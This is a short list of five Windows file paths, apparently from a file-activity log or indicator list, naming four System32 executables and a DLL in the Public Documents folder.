file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\Public\Documents\ssd.dll
file C:\Windows\System32\cmd.exe